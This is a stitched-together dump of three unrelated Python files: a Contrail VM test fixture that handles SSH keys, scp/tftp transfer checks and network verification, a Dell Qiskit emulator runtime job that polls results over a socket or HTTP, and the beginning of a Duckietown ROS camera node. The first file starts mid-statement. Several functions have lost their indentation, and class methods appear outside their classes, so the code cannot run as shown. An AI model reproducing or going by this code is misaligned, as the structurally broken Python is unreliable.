            'Exception occured while trying to scp the file ')
# end scp_file_to_vm
def put_pub_key_to_vm(self):
    '''Install the test public key (/tmp/id_rsa.pub) into both the VM
    user's and root's authorized_keys so later key-based SSH works.
    '''
    self.logger.debug('Copying public key to VM %s' % (self.vm_name))
    self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
    auth_file = '.ssh/authorized_keys'
    self.run_cmd_on_vm(['mkdir -p ~/.ssh'])
    host = self.inputs.host_data[self.vm_node_ip]
    with hide('everything'):
        with settings(
                host_string='%s@%s' % (host['username'], self.vm_node_ip),
                password=host['password'],
                warn_only=True, abort_on_prompts=False):
            # NOTE(review): key_file is fetched but unused here.
            key_file = self.nova_fixture.tmp_key_file
            fab_put_file_to_vm(host_string='%s@%s' % (
                self.vm_username, self.local_ip),
                password=self.vm_password,
                src='/tmp/id_rsa.pub', dest='/tmp/')
    # Append the key for the login user and for root, then tighten modes.
    self.run_cmd_on_vm(['cat /tmp/id_rsa.pub >> ~/%s' % (auth_file)])
    self.run_cmd_on_vm(['chmod 600 ~/%s' % (auth_file)])
    self.run_cmd_on_vm(['cat /tmp/id_rsa.pub >> /root/%s' %
                        (auth_file)], as_sudo=True)
    self.run_cmd_on_vm(['chmod 600 /root/%s' % (auth_file)], as_sudo=True)
def check_file_transfer(self, dest_vm_fixture, mode='scp', size='100'):
    '''
    Creates a file of "size" bytes and transfers to the VM in dest_vm_fixture using mode scp/tftp.

    Returns True when the destination's `ls -l` output contains the byte
    size (the size check is a substring match on the listing), False on
    an unknown mode or a size mismatch.
    '''
    filename = 'testfile'
    dest_vm_ip = dest_vm_fixture.vm_ip
    # Create file
    cmd = 'dd bs=%s count=1 if=/dev/zero of=%s' % (size, filename)
    self.run_cmd_on_vm(cmds=[cmd])
    # Copy file
    if mode == 'scp':
        # Make sure the destination user account accepts the test key.
        dest_vm_fixture.run_cmd_on_vm(
            cmds=['cp -f ~root/.ssh/authorized_keys ~/.ssh/'], as_sudo=True)
        self.scp_file_to_vm(filename, vm_ip=dest_vm_ip)
    elif mode == 'tftp':
        # Create the file on the remote machine so that put can be done
        dest_vm_fixture.run_cmd_on_vm(
            cmds=['sudo touch /var/lib/tftpboot/%s' % (filename),
                  'sudo chmod 777 /var/lib/tftpboot/%s' % (filename)])
        self.tftp_file_to_vm(filename, vm_ip=dest_vm_fixture.vm_ip)
    else:
        self.logger.error('No transfer mode specified!!')
        return False
    self.run_cmd_on_vm(cmds=['sync'])
    # Verify if file size is same
    if mode == 'scp':
        out_dict = dest_vm_fixture.run_cmd_on_vm(
            cmds=['ls -l %s' % (filename)])
    elif mode == 'tftp':
        out_dict = dest_vm_fixture.run_cmd_on_vm(
            cmds=['ls -l /var/lib/tftpboot/%s' % (filename)])
    if size in out_dict.values()[0]:
        self.logger.info('File of size %s is trasferred successfully to \
            %s by %s ' % (size, dest_vm_ip, mode))
    else:
        self.logger.warn('File of size %s is not trasferred fine to %s \
            by %s !! Pls check logs' % (size, dest_vm_ip, mode))
        return False
    return True
# end check_file_transfer
def get_rsa_to_vm(self):
    '''Get the rsa file to the VM from the agent.

    Copies the test private key (nova_fixture.tmp_key_file) into the
    VM's home directory as id_rsa so that scp/ssh from inside the VM
    can authenticate. Failures are logged, not raised.
    '''
    host = self.inputs.host_data[self.vm_node_ip]
    output = ''
    try:
        self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
        with hide('everything'):
            with settings(
                    host_string='%s@%s' % (
                        host['username'], self.vm_node_ip),
                    password=host['password'],
                    warn_only=True, abort_on_prompts=False):
                key_file = self.nova_fixture.tmp_key_file
                fab_put_file_to_vm(host_string='%s@%s' % (
                    self.vm_username, self.local_ip),
                    password=self.vm_password,
                    src=key_file, dest='~/')
                # ssh refuses keys with permissive modes.
                self.run_cmd_on_vm(cmds=['chmod 600 id_rsa'])
    except Exception, e:
        self.logger.exception(
            'Exception occured while trying to get the rsa file to the \
            VM from the agent')
# end get_rsa_to_vm
def run_cmd_on_vm(self, cmds=[], as_sudo=False):
'''run cmds on VM
'''
self.return_output_cmd_dict = {}
self.return_output_values_list = []
cmdList = cmds
host = self.inputs.host_data[self.vm_node_ip]
output = ''
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
fab_connections.clear()
with hide('everything'):
with settings(
host_string='%s@%s' % (host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
for cmd in cmdList:
self.logger.debug('Running Cmd on %s: %s' % (
self.vm_node_ip, cmd))
output = run_fab_cmd_on_node(
host_string='%s@%s' % (
self.vm_username, self.local_ip),
password=self.vm_password,
cmd=cmd,
as_sudo=as_sudo)
self.logger.debug(output)
self.return_output_values_list.append(output)
self.return_output_cmd_dict = dict(
zip(cmdList, self.return_output_values_list))
return self.return_output_cmd_dict
except Exception, e:
self.logger.exception(
'Exception occured while trying ping from VM ')
return self.return_output_cmd_dict
def get_vm_ip_from_vm(self, vn_fq_name=None):
    ''' Get VM IP from Ifconfig output executed on VM
    '''
    if not vn_fq_name:
        vn_fq_name = self.vn_fq_names[0]
    grep_cmd = "ifconfig | grep %s" % (self.tap_intf[vn_fq_name]['ip_addr'])
    self.run_cmd_on_vm(cmds=[grep_cmd])
    ifconfig_line = self.return_output_cmd_dict[grep_cmd]
    found = re.search('inet addr:(.+?) Bcast:', ifconfig_line)
    # None when the expected 'inet addr:... Bcast:' pattern is absent.
    return found.group(1) if found else None
# end def
def wait_till_vm_is_up(self):
    '''Wait until the VM is fully usable: launched, details gathered
    (metadata IP reachable from the compute) and SSH-able.
    '''
    result = self.verify_vm_launched()
    #console_check = self.nova_fixture.wait_till_vm_is_up(self.vm_obj)
    #result = result and self.nova_fixture.wait_till_vm_is_up(self.vm_obj)
    #if not console_check :
    #    import pdb; pdb.set_trace()
    #    self.logger.warn('Console logs didnt give enough info on bootup')
    # Refresh the nova server object in-place before gathering details.
    self.vm_obj.get()
    result = result and self._gather_details()
    result = result and self.wait_for_ssh_on_vm()
    if not result :
        self.logger.error('Failed to SSH to VM %s' % (self.vm_name))
        return result
    return True
# end wait_till_vm_is_up
def wait_for_ssh_on_vm(self):
    '''Check (from the compute node, with fab-side retries) that the VM
    accepts SSH connections; returns True/False based on the fab output.
    '''
    self.logger.info('Waiting to SSH to VM %s, IP %s' % (self.vm_name,
                                                         self.vm_ip))
    # Need fab files on compute node before talking to VMs
    host = self.inputs.host_data[self.vm_node_ip]
    with settings(host_string='%s@%s' % (host['username'],
                                         self.vm_node_ip), password=host['password'],
                  warn_only=True, abort_on_prompts=False):
        put('tcutils/fabfile.py', '~/')
    # Check if ssh from compute node to VM works(with retries)
    cmd = 'fab -u %s -p %s -H %s -D -w --hide status,user,running wait_for_ssh:' % (self.vm_username, self.vm_password, self.local_ip)
    output = self.inputs.run_cmd_on_server(self.vm_node_ip, cmd,
                                           self.inputs.host_data[
                                               self.vm_node_ip]['username'],
                                           self.inputs.host_data[self.vm_node_ip]['password'])
    output = remove_unwanted_output(output)
    # The fab task prints 'True' on success; match on that marker.
    if 'True' in output :
        self.logger.info('VM %s is ready for SSH connections ' % (
            self.vm_name))
        return True
    else:
        self.logger.error('VM %s is NOT ready for SSH connections ' % (
            self.vm_name))
        return False
# end wait_for_ssh_on_vm
def get_vm_ipv6_addr_from_vm(self, intf='eth0', addr_type='link'):
    ''' Get VM IPV6 from Ifconfig output executed on VM
    '''
    # Map the requested scope to the ifconfig line pattern; unknown
    # scopes yield None, exactly like the original if/elif/else chain.
    scope_patterns = {
        'link': 'inet6 addr:(.+?) Scope:Link',
        'global': 'inet6 addr:(.+?) Scope:Global',
    }
    cmd = "ifconfig %s| awk '/inet6/ {print $3}'" % (intf)
    self.run_cmd_on_vm(cmds=[cmd])
    if cmd not in self.return_output_cmd_dict.keys():
        return None
    pattern = scope_patterns.get(addr_type)
    if pattern is None:
        return None
    matched = re.search(pattern, self.return_output_cmd_dict[cmd])
    return matched.group(1) if matched else None
def get_active_controller(self):
    ''' Get the active control node for this VM's compute.

    Scans the agent's XMPP connection status and returns the IP of the
    controller that is both the config controller and in Established
    state; logs an error and returns None when none qualifies.
    '''
    active_controller = None
    inspect_h = self.agent_inspect[self.vm_node_ip]
    agent_xmpp_status = inspect_h.get_vna_xmpp_connection_status()
    for entry in agent_xmpp_status:
        if entry['cfg_controller'] == 'Yes' \
                and entry['state'] == 'Established':
            active_controller = entry['controller_ip']
    if not active_controller:
        # Fixed typo in the log message ('controlloer' -> 'controller').
        self.logger.error('Active controller is not found')
    return active_controller
def install_pkg(self, pkgname="Traffic"):
    '''Build `pkgname` on the first cfgm node and install it inside this
    VM (reached via its metadata IP with the test key). Asserts on
    build/install failure.
    '''
    pkgsrc = PkgHost(self.inputs.cfgm_ips[0], self.vm_node_ip,
                     self.inputs.username, self.inputs.password)
    self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
    key = self.nova_fixture.tmp_key_file
    pkgdst = PkgHost(self.local_ip, key=key, user=self.vm_username,
                     password=self.vm_password)
    # Stale cached fab connections can point at dead sessions; clear first.
    fab_connections.clear()
    assert build_and_install(pkgname, pkgsrc, pkgdst, self.logger)
@retry(delay=2, tries=15)
def verify_vm_flows_removed(self):
    '''Check on the compute node that no vrouter flow still references
    this VM's IP; mirrors the outcome in self.vm_flows_removed_flag,
    which cleanUp() reads after teardown.
    '''
    cmd = 'flow -l '
    result = True
    self.vm_flows_removed_flag = True
    output = self.inputs.run_cmd_on_server(self.vm_node_ip, cmd,
                                           self.inputs.host_data[
                                               self.vm_node_ip][
                                               'username'],
                                           self.inputs.host_data[self.vm_node_ip]['password'])
    # A live flow entry shows the VM IP followed by ':' in the listing.
    if '%s:' % (self.vm_ip) in output:
        self.logger.warn(
            "One or more flows still present on Compute node after VM delete : %s" % (output))
        result = False
    else:
        self.logger.info("All flows for the VM deleted on Compute node")
    self.vm_flows_removed_flag = self.vm_flows_removed_flag and result
    return result
# end verify_vm_flows_removed
@retry(delay=3, tries=30)
def _gather_details(self):
    '''Collect per-VM plumbing details needed by later verifications:
    hosting compute IPs, VMI objects from the API server, tap-interface
    details from the agent, and the link-local metadata IPs. Returns
    True once a pingable metadata IP (self.local_ip) is known.
    '''
    self.cs_vmi_objs = {}
    self.cs_vmi_obj = {}
    self.vm_id = self.vm_objs[0].id
    # Figure out the local metadata IP of the VM reachable from host
    nova_host = self.inputs.host_data[
        self.nova_fixture.get_nova_host_of_vm(self.vm_obj)]
    self.vm_node_ip = nova_host['host_ip']
    self.vm_node_data_ip = nova_host['host_data_ip']
    inspect_h= self.agent_inspect[self.vm_node_ip]
    cfgm_ip = self.inputs.cfgm_ips[0]
    api_inspect = self.api_s_inspects[cfgm_ip]
    self.cs_vmi_objs[cfgm_ip]= api_inspect.get_cs_vmi_of_vm( self.vm_id)
    # Index the VMIs by the fq-name of the network they attach to.
    for vmi_obj in self.cs_vmi_objs[cfgm_ip]:
        vmi_vn_fq_name= ':'.join(
            vmi_obj['virtual-machine-interface']['virtual_network_refs'][0]['to'])
        self.cs_vmi_obj[vmi_vn_fq_name] = vmi_obj
    for vn_fq_name in self.vn_fq_names:
        (domain, project, vn)= vn_fq_name.split(':')
        vna_tap_id = inspect_h.get_vna_tap_interface_by_vmi(
            vmi_id=self.cs_vmi_obj[vn_fq_name][
                'virtual-machine-interface' ]['uuid'])
        self.tap_intf[vn_fq_name] = vna_tap_id[0]
        # Replace the summary entry with the agent's full intf details.
        self.tap_intf[vn_fq_name]= inspect_h.get_vna_intf_details(
            self.tap_intf[vn_fq_name][ 'name' ])[0]
        self.local_ips[vn_fq_name] = self.tap_intf[vn_fq_name]['mdata_ip_addr']
        if self.local_ips[vn_fq_name] != '0.0.0.0':
            # Ping is tried twice; first attempt can fail while ARP warms up.
            if self.ping_vm_from_host(vn_fq_name) or self.ping_vm_from_host( vn_fq_name) :
                self.local_ip= self.local_ips[vn_fq_name]
    if not self.local_ip:
        return False
    return True
# end _gather_details
def interface_attach(self, port_id=None, net_id=None, fixed_ip=None):
    '''Hot-plug a port/network onto this VM and return nova's response.'''
    server = self.vm_obj
    self.logger.info('Attaching port %s to VM %s' %(port_id, server.name))
    return server.interface_attach(port_id, net_id, fixed_ip)

def interface_detach(self, port_id):
    '''Hot-unplug the given port from this VM and return nova's response.'''
    server = self.vm_obj
    self.logger.info('Detaching port %s from VM %s' %(port_id, server.name))
    return server.interface_detach(port_id)
# end VMFixture
class VMData(object):
    """Value object bundling the parameters needed to launch one VM."""

    def __init__(self, name, vn_obj, image='ubuntu', project='admin', flavor='m1.tiny'):
        # Plain attribute storage, struct-style; no validation performed.
        self.name, self.vn_obj = name, vn_obj
        self.image, self.project = image, project
        self.flavor = flavor
class MultipleVMFixture(fixtures.Fixture):

    """
    Fixture to handle creation, verification and deletion of multiple VMs.

    Deletion of the VM upon exit can be disabled by setting fixtureCleanup= 'no'
    in params file. If a VM with the vm_name is already present, it is not
    deleted upon exit. To forcefully clean them up, set fixtureCleanup= 'force'
    """

    def __init__(self, connections, vms=None, vn_objs=None, image_name='ubuntu',
                 vm_count_per_vn=2, flavor='contrail_flavor_small', project_name='admin'):
        """
        vms : List of dictionaries of VMData objects.
        or
        vn_objs : List of tuples of VN name and VNfixture.obj returned by the
        get_all_fixture method of MultipleVNFixture.
        """
        self.connections = connections
        self.nova_fixture = self.connections.nova_fixture
        self.project_name = project_name
        # Mutable defaults ([]) replaced with None + normalization to avoid
        # the shared-mutable-default pitfall; callers are unaffected.
        self.vms = vms or []
        self.vm_count = vm_count_per_vn
        self.vn_objs = vn_objs or []
        self.flavor = flavor
        self.image_name = image_name
        self.inputs = self.connections.inputs
        self.logger = self.inputs.logger
    # end __init__

    def create_vms_in_vn(self, name, image, flavor, project, vn_obj):
        '''Launch self.vm_count VMs named <name>_vm_<i> on the given VN.

        Stops at the first failure; successfully created fixtures are
        appended to self._vm_fixtures as (vm_name, fixture) tuples.
        '''
        for c in range(self.vm_count):
            vm_name = '%s_vm_%s' % (name, c)
            try:
                vm_fixture = self.useFixture(VMFixture(image_name=image,
                    project_name=project, flavor=flavor, connections=self.connections,
                    vn_obj=vn_obj, vm_name=vm_name))
            except Exception as err:
                self.logger.error(err)
                self.logger.debug(traceback.format_exc())
                break
            else:
                self._vm_fixtures.append((vm_name, vm_fixture))

    def setUp(self):
        '''Create the requested VMs, either from explicit VMData entries
        or vm_count_per_vn VMs on each supplied VN.
        '''
        super(MultipleVMFixture, self).setUp()
        self._vm_fixtures = []
        if self.vms:
            # BUG FIX: the original iterated the bare name 'vms', which is
            # undefined here (NameError); it must be self.vms.
            for vm in self.vms:
                self.create_vms_in_vn(vm.name, vm.image, vm.flavor, vm.project,
                                      vm.vn_obj)
        elif self.vn_objs:
            for vn_name, vn_obj in self.vn_objs:
                self.create_vms_in_vn(vn_name, self.image_name, self.flavor,
                                      self.project_name, vn_obj)
        else:
            self.logger.error("One of vms, vn_objs is required.")

    def verify_on_setup(self):
        '''Return True only when every expected VM was created and each
        individual VMFixture verifies.
        '''
        # TODO
        # Not expected to do verification when self.count > 1
        created_vms = len(self._vm_fixtures)
        expected_vms = len(self.vms)
        if self.vn_objs:
            expected_vms = self.vm_count * len(self.vn_objs)
        if created_vms != expected_vms:
            return False
        result = True
        for vm_name, vm_fixture in self._vm_fixtures:
            result &= vm_fixture.verify_on_setup()
        return result

    def get_all_fixture(self):
        '''Accessor for the list of (vm_name, VMFixture) tuples.'''
        return self._vm_fixtures
|
emulator_runtime_job.py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# Copyright 2021 Dell (www.dell.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dell_runtime.emulation_executor import EmulationExecutor
from typing import Any, Optional, Callable, Dict, Type
import time
import logging
import asyncio
from concurrent import futures
import traceback
import queue
from datetime import datetime
from qiskit.providers.ibmq.runtime.program.result_decoder import ResultDecoder
from urllib.parse import urljoin
import requests
import threading
from datetime import datetime
import json
import socket
logger = logging.getLogger(__name__)
class EmulatorRuntimeJob:
    """Representation of a runtime program execution.

    A new ``EmulatorRuntimeJob`` instance is returned when you call
    job = provider.runtime.run(...)
    """
    def __init__(
        self,
        job_id,
        host,
        session: Optional[Type[requests.Session]] = None,
        executor: Optional[Type[EmulationExecutor]] = None,
        result_decoder: Type[ResultDecoder] = ResultDecoder,
        callback: Optional[Callable] = None
    ) -> None:
        """RuntimeJob constructor.

        Args:
            job_id: Identifier of the job to track.
            host: Base URL of the remote runtime server; falsy means the
                job runs locally and results arrive over a local socket.
            session: HTTP session used for remote polling (remote mode).
            executor: Local emulation executor (local mode).
            result_decoder: Decoder class applied to result payloads.
            callback: Optional callable invoked with each interim message.
        """
        # NOTE(review): this instance attribute shadows the job_id()
        # method defined later in the class — confirm which is intended.
        self.job_id = job_id
        self.host = host
        self._sock = None
        self.local_port = None
        self.executor = executor
        self.session = session
        self._status = None
        self._msgRead = 0           # count of interim messages already handed out
        self._imsgs = []            # interim messages received so far
        self._finalResults = None   # set once the final message arrives
        self._kill = False          # set to tell the poller thread to stop
        if not self.host:
            # Local mode: listen on an ephemeral localhost port; the
            # executor connects back and streams results over this socket.
            self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._sock.bind(('localhost', 0))
            self.local_port = self._sock.getsockname()[1]
            logger.debug(self.local_port)
            self._poller = threading.Thread(target=self.local_poll_for_results, args=(callback,))
        else:
            # Remote mode: poll the server over HTTP for new messages.
            self._poller = threading.Thread(target=self.remote_poll_for_results,args=(callback,))
        self.result_decoder = result_decoder
        self._poller.start()
        if self.executor:
            # Tell the executor which local port to stream results to.
            self.executor._local_port = self.local_port
            self.executor.run()
def __del__(self):
    """Signal the poller thread to stop and best-effort wait for it."""
    self._kill = True
    try:
        self._poller.join()
    except Exception:
        # Narrowed from a bare 'except:' (which also swallowed
        # SystemExit/KeyboardInterrupt). The original logged
        # "poller thread joined" here, i.e. on FAILURE — the message
        # now reflects what actually happened.
        logger.debug("failed to join poller thread", exc_info=True)
    # self.executor.__del__()
def job_completed(self):
    """Refresh the cached status and report whether it is terminal."""
    self.status()
    return self._status in ("Failed", "Completed", "Canceled")
def local_poll_for_results(self,callback):
    """Poller thread body for local mode.

    Accepts one connection from the local executor (120 s timeout) and
    reads EOT-delimited (\\u0004) JSON messages until the final result
    arrives, the job is killed, or the job reports completion. Interim
    messages are queued in self._imsgs and forwarded to `callback`.
    """
    logger.debug(f"starting to listen to port {self.local_port}")
    self._sock.listen(1)
    self._sock.settimeout(120)
    try:
        conn, addr = self._sock.accept()
        logger.debug(f"accepted client connection from {addr}")
        with conn:
            while self._finalResults == None and not self._kill and not self.job_completed():
                data = conn.recv(16384)
                if not data:
                    # Peer closed the connection; stop reading.
                    break
                else:
                    data_str = data.decode('utf-8')
                    # Messages are terminated by U+0004; drop the trailing
                    # (possibly partial) fragment after the last delimiter.
                    msgs = data_str.split('\u0004')[:-1]
                    for msg in msgs:
                        data_obj = json.loads(msg, cls=self.result_decoder)
                        # print(f"MESSENGER RECEIVED: {data_obj}")
                        message = data_obj["message"]
                        if data_obj['final']:
                            logger.debug('result: got final result.')
                            self._finalResults = message
                        else:
                            self._imsgs.append(message)
                            if callback is not None:
                                callback(message)
        self._sock.close()
        logger.debug("local thread: exiting")
        return
    except socket.timeout as e:
        # No executor connected within the timeout; give up quietly.
        logger.debug(e)
def remote_poll_for_results(self, callback):
    """Poller thread body for remote mode.

    Every 3 s fetches new messages from the server (incrementally, using
    the newest timestamp seen so far), queues interim messages, forwards
    them to `callback`, and records the final result. Performs one extra
    loop after the job finishes so trailing messages are not lost.
    """
    # NOTE(review): dcd is assigned but never used in this method.
    dcd = self.result_decoder
    lastTimestamp = None
    stay_alive = True
    final_loop = False
    while stay_alive:
        time.sleep(3)
        url = self.getURL('/job/'+ self.job_id +'/results')
        if lastTimestamp:
            # Only ask for messages newer than the last one we saw.
            url = self.getURL('/job/'+ self.job_id +'/results/' + str(lastTimestamp))
        response = self.session.get(url)
        if response.status_code == 204:
            logger.debug('result: status 204, no new messages.')
            continue
        response.raise_for_status()
        res_json = json.loads(response.text)
        logger.debug(f'got: {res_json}')
        messages = res_json["messages"]
        logger.debug(f'result: got {messages}')
        for msg in messages:
            # Track the newest timestamp for the next incremental fetch.
            if not lastTimestamp:
                lastTimestamp = datetime.fromisoformat(msg['timestamp'])
            else:
                msgTime = datetime.fromisoformat(msg['timestamp'])
                if lastTimestamp < msgTime:
                    lastTimestamp = msgTime
            msg_data = json.loads(msg['data'])
            if msg_data['final']:
                logger.debug('result: got final result.')
                self._finalResults = msg_data['message']
            else:
                self._imsgs.append(msg_data['message'])
                logger.debug("appended message to queue")
                if callback is not None:
                    logger.debug('Callback is here')
                    callback(msg_data['message'])
        if final_loop:
            # The previous pass already detected completion; this pass
            # drained any remaining messages, so we can exit now.
            stay_alive = False
            continue
        final_loop = not (self._finalResults == None and not self._kill and not self.job_completed())
        # logger.debug(f"final: {final_loop}")
        # logger.debug(f"results: {self._finalResults}")
        # logger.debug(f"kill: {self._kill}")
        # logger.debug(f"completed: {self.job_completed()}")
    return
def getURL(self, path):
    """Join *path* onto the configured host and return the full URL."""
    full_url = urljoin(self.host, path)
    logger.debug(f"{full_url}")
    return full_url
def result(self,
           timeout: Optional[float] = None):
    """Return the final result, waiting up to `timeout` seconds for it.

    When `timeout` is None no waiting is performed and whatever is
    currently stored (possibly None) is returned immediately.

    Raises:
        Exception: when a timeout was given and the final result did not
            arrive in time; the poller thread is also told to stop.
    """
    if timeout is not None:
        stime = time.time()
        # 'is None' (identity) instead of the original '== None': the
        # final result is an arbitrary decoded object whose __eq__ could
        # misbehave or be expensive.
        while self._finalResults is None:
            elapsed_time = time.time() - stime
            if elapsed_time >= timeout:
                self._kill = True
                raise Exception('Timeout while waiting for job {}.'.format(self.job_id))
            time.sleep(1)
    return self._finalResults
def get_unread_messages(self):
    """Return the interim messages received since the previous call."""
    first_unread = self._msgRead
    total = len(self._imsgs)
    if total == first_unread:
        return []
    self._msgRead = total
    return self._imsgs[first_unread:]
def cancel(self) -> bool:
    """Cancel the job.

    Local jobs are cancelled through the executor; remote jobs via the
    server's /cancel endpoint. (Return annotation corrected from None
    to bool to match the actual returns below.)

    Returns:
        True when the cancellation was accepted; False when the server
        answered 204 (nothing to cancel).
    Raises:
        requests.HTTPError: on a failing HTTP status from the server.
    """
    self._kill = True
    if self.executor:
        self.executor.cancel()
        return True
    url = self.getURL('/job/' + self.job_id + '/cancel')
    response = self.session.get(url)
    response.raise_for_status()
    if response.status_code == 200:
        return True
    elif response.status_code == 204:
        return False
def status(self):
    """Return the status of the job.

    Local jobs delegate to the executor; remote jobs query the server
    and cache the response text in self._status.

    Returns:
        Status of this job as a string, or None when the server answered
        204 (no status available yet).
    Raises:
        requests.HTTPError: on a failing HTTP status from the server.
    """
    if self.executor:
        return self.executor.get_status()
    url = self.getURL('/job/' + self.job_id + '/status')
    response = self.session.get(url)
    response.raise_for_status()
    if response.status_code == 200:
        self._status = response.text
        return self._status
    elif response.status_code == 204:
        return None
def wait_for_final_state(
    self,
) -> None:
    """Poll the job status until it progresses to a final state such as ``DONE`` or ``ERROR``.

    NOTE(review): not implemented in the emulator — currently a no-op
    kept for interface parity with the IBMQ RuntimeJob.
    """

# def stream_results(
#     self,
#     callback: Callable,
#     decoder: Optional[Type[ResultDecoder]] = None
# ) -> None:
#     dcd = decoder or self.result_decoder
#     isFinal = False
#     while not isFinal:
#         response = requests.get(self.getURL('/jobs/'+ self.job_id +'/results'))
#         response.raise_for_status()
#         results = dcd.decode(response.text)
#         for result in results:
#             callback(result['message'])
#             isFinal = result['final']

def cancel_result_streaming(self) -> None:
    """Cancel result streaming. No-op in the emulator."""

def _start_websocket_client(
    self,
) -> None:
    """Start websocket client to stream results.

    No-op in the emulator (results arrive via the poller thread).
    """

def _stream_results(
    self,
) -> None:
    """Stream interim results. No-op in the emulator."""

def _empty_result_queue(self, result_queue: queue.Queue) -> None:
    """Empty the result queue. No-op in the emulator."""
def job_id(self) -> str:
    """Return a unique ID identifying the job.

    NOTE(review): __init__ assigns the instance attribute ``self.job_id``,
    which shadows this (non-property) method, and ``self._job_id`` is
    never assigned anywhere visible — this accessor looks unreachable /
    dead as written; confirm before relying on it.

    Returns:
        Job ID.
    """
    return self._job_id

#def backend(self) -> Backend:
#    """Return the backend where this job was executed.
#    Returns:
#        Backend used for the job.
#    """
#    return self._backend

@property
def inputs(self) -> Dict:
    """Job input parameters.

    NOTE(review): ``self._params`` is not set in __init__; presumably
    assigned elsewhere — verify against callers before use.

    Returns:
        Input parameters used in this job.
    """
    return self._params

@property
def program_id(self) -> str:
    """Program ID.

    NOTE(review): ``self._program_id`` is not set in __init__; verify it
    is assigned elsewhere before use.

    Returns:
        ID of the program this job is for.
    """
    return self._program_id

@property
def creation_date(self) -> Optional[datetime]:
    """Job creation date in local time.

    Returns:
        The job creation date as a datetime object, in local time, or
        ``None`` if creation date is not available.
    """
    # No body: always returns None in the emulator.

@property
def user_messenger(self):
    # Messenger used to deliver interim results to the user program.
    return self._user_messenger

@user_messenger.setter
def user_messenger(self, messenger):
    self._user_messenger = messenger
face_lulala_alphaduck_back.py | #!/usr/bin/env python
import rospy
import cv2
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage, Image
from duckietown_msgs.msg import Segment, SegmentList, Vector2D
from line_detector.WhiteBalance import *
from visualization_msgs.msg import Marker
from geometry_msgs.msg import Point
import numpy as np
import threading
#from PIL import Image as pimg
#import jpeg4py as jpeg
class FaceLulalaAlphaduckNode(object):
    '''ROS node that subscribes to a compressed camera image topic and
    runs line detection (with optional white balancing) on each frame,
    processing frames on a background thread.
    '''

    def __init__(self):
        self.node_name = "face_lulala_alphaduck"
        # Thread lock
        self.thread_lock = threading.Lock()
        # Constructor of line detector
        self.bridge = CvBridge()
        # NOTE(review): LineDetector is not imported by name in the
        # visible imports — presumably provided by the wildcard import
        # from line_detector.WhiteBalance; confirm.
        self.detector = LineDetector()
        self.wb = WhiteBalance()
        # True once a white-balance reference frame has been captured.
        self.flag_wb_ref = False
        # Parameters (read from the private ROS parameter namespace)
        self.flag_wb = rospy.get_param('~white_balance')
        self.image_size = rospy.get_param('~img_size')
        self.top_cutoff = rospy.get_param('~top_cutoff')
        self.detector.hsv_white1 = np.array(rospy.get_param('~hsv_white1'))
        self.detector.hsv_white2 = np.array(rospy.get_param('~hsv_white2'))
        self.detector.hsv_yellow1 = np.array(rospy.get_param('~hsv_yellow1'))
        self.detector.hsv_yellow2 = np.array(rospy.get_param('~hsv_yellow2'))
        self.detector.hsv_red1 = np.array(rospy.get_param('~hsv_red1'))
        self.detector.hsv_red2 = np.array(rospy.get_param('~hsv_red2'))
        self.detector.hsv_red3 = np.array(rospy.get_param('~hsv_red3'))
        self.detector.hsv_red4 = np.array(rospy.get_param('~hsv_red4'))
        self.detector.dilation_kernel_size = rospy.get_param('~dilation_kernel_size')
        self.detector.canny_thresholds = rospy.get_param('~canny_thresholds')
        self.detector.hough_min_line_length = rospy.get_param('~hough_min_line_length')
        self.detector.hough_max_line_gap = rospy.get_param('~hough_max_line_gap')
        self.detector.hough_threshold = rospy.get_param('~hough_threshold')
        # Publishers
        # NOTE(review): Twist2DStamped is not among the visible imports —
        # verify it is imported elsewhere in this file.
        self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
        # Verbose option
        self.verbose = rospy.get_param('~verbose')
        if self.verbose:
            self.toc_pre = rospy.get_time()
        # Subscribers
        self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
        rospy.loginfo("[%s] Initialized." %(self.node_name))
def cbImage(self,image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns rightaway
def processImage(self,image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency received = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# time_start = rospy.Time.now()
# time_start = event.last_real
# msg_age = time_start - image_msg.header.stamp
# rospy.loginfo("[LineDetector] image age: %s" %msg_age.to_sec())
# Decode from compressed image
# with OpenCV
image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
# with PIL Image
# image_cv = jpeg.JPEG(np.fromstring(image_msg.data, np.uint8)).decode()
# with libjpeg-turbo
# Convert from uncompressed image message
# image_cv = self.bridge.imgmsg_to_cv2(image_msg, "bgr8")
# Verbose
if self.verbose:
self.tic = rospy.get_time()
rospy.loginfo("[%s] Latency image decompressed = %.3f ms" %(self.node_name, (self.tic-image_msg.header.stamp.to_sec()) * 1000.0))
# White balancing: set reference image to estimate parameters
if self.flag_wb and (not self.flag_wb_ref):
# set reference image to estimate parameters
self.wb.setRefImg(image_cv)
rospy.loginfo("[%s] White balance: parameters computed." %(self.node_name))
print self.wb.norm_bgr
self.flag_wb_ref = True
# Resize and crop image
hei_original = image_cv.shape[0]
